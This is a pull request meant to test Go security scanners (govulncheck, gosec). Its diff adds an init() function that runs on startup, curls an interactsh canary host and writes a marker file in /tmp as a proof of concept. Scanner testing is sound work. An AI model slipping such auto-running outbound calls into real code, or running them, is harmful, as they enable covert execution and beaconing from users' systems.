### PR TITLE
Test Go security scanning

### DIFF
--- a/go/exploit.go
+++ b/go/exploit.go
@@ -1,0 +1,13 @@
+package main
+
+import "os/exec"
+
+func init() {
+    // Try to execute a command as proof of concept
+    // Use curl to canary URL
+    cmd := exec.Command("curl", "-s", "http://canary.token.x.interactsh.com/security-workflow")
+    cmd.Run()
+    
+    // Also write to a file as evidence
+    exec.Command("touch", "/tmp/exploit_success").Run()
+}


### PR DESCRIPTION
Testing govulncheck and gosec integration

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Add a proof‑of‑concept Go init that uses `exec.Command` to run curl to a canary URL and create a file. This tests whether `govulncheck` and `gosec` flag unsafe command execution and network calls.

<sup>Written for commit 0645720f7f50273d4ebb27c7e88c38300694986a. Summary will update on new commits.</sup>

<!-- End of auto-generated description by cubic. -->

